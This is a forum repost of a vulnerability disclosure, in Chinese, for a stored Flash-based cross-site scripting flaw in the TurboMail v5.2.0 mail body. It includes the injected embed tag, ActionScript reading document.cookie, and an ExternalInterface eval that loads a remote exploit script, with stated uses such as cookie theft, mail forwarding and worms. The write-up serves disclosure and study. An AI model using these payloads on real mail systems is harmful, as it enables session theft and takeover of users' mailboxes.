冰楓論壇

 找回密碼
 立即註冊
搜索
查看: 1483|回覆: 0
打印 上一主題 下一主題

[漏洞分析] Turbomail郵件系統正文持久型XSS漏洞

[複製鏈接]

180

主題

0

好友

169

積分

註冊會員

Rank: 2

UID
202597
帖子
180
主題
180
精華
0
積分
169
楓幣
1585
威望
168
存款
0
贊助金額
0
推廣
0
GP
143
閱讀權限
20
性別
保密
在線時間
14 小時
註冊時間
2017-8-22
最後登入
2019-5-23
跳轉到指定樓層
1
發表於 2017-10-25 19:26:05 |只看該作者 |倒序瀏覽
漏洞作者:路人甲簡要描述:
郵件系統對郵件內容過濾不嚴格,導致存儲型跨站。
詳細說明:
1、TurboMail郵件系統對郵件內容過濾不嚴格,導致存儲型FLASH跨站,打開郵件即可觸發漏洞,由於FLASH文件可以執行javascript代碼,所以我們可以利用此漏洞進行盜取用戶信息、用戶郵件、釣魚、修改用戶設置、轉發郵件等操作。
涉及版本v5.2.0
漏洞證明:
測試瀏覽器:Firefox29.0.1、Chrome33.0.1750.149 m
1、寫郵件,使用代理對請求進行攔截,本次使用burp suite,修改htmlbody字段值(即郵件內容),如下圖所示:

099.jpg

嵌入的惡意代碼解碼後的內容為:
<embed allowscriptaccess="always" width="0%" height="0%" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shock-wave-flash" src ="http://127.0.0.1/xss.swf"></embed>
xss.swf內的腳本代碼為:getURL("javascript:alert(document.cookie)");
2、用戶打開郵件,漏洞觸發:

099.jpg

3、使用Firebug查看頁面源代碼:
099.jpg


flash文件成功插入,且允許執行腳本代碼
4、修改xss.swf文件內容,
import flash.external.ExternalInterface;
ExternalInterface.call("eval","d=document;e=d.createElement('script');e.src='http://127.0.0.1/eXploit.js';d.body.appendChild(e) ;");//使用ExternalInterface.call()函數加載本地腳本文件,通過修改本地腳本文件內容我們可以進行盜取用戶信息、用戶郵件、釣魚,編寫蠕蟲等操作。
通過修改eXploit.js文件內容,我們可以進行盜取cookie,轉發郵件、刪除用戶郵件等操作。



收藏收藏0 推0 噓0


把本文推薦給朋友或其他網站上,每次被點擊增加您在本站積分: 1彩票
複製連結並發給好友,以賺取推廣點數
簡單兩步驟,註冊、分享網址,即可獲得獎勵! 一起推廣文章換商品、賺$$
高級模式
B Color Image Link Quote Code Smilies |上傳

廣告刊登意見回饋關於我們管群招募本站規範DMCA隱私權政策

Copyright © 2011-2024 冰楓論壇, All rights reserved

免責聲明:本網站是以即時上載留言的方式運作,本站對所有留言的真實性、完整性及立場等,不負任何法律責任。

而一切留言之言論只代表留言者個人意見,並非本網站之立場,用戶不應信賴內容,並應自行判斷內容之真實性。

小黑屋|手機版|冰楓論壇

GMT+8, 2024-11-23 09:05

回頂部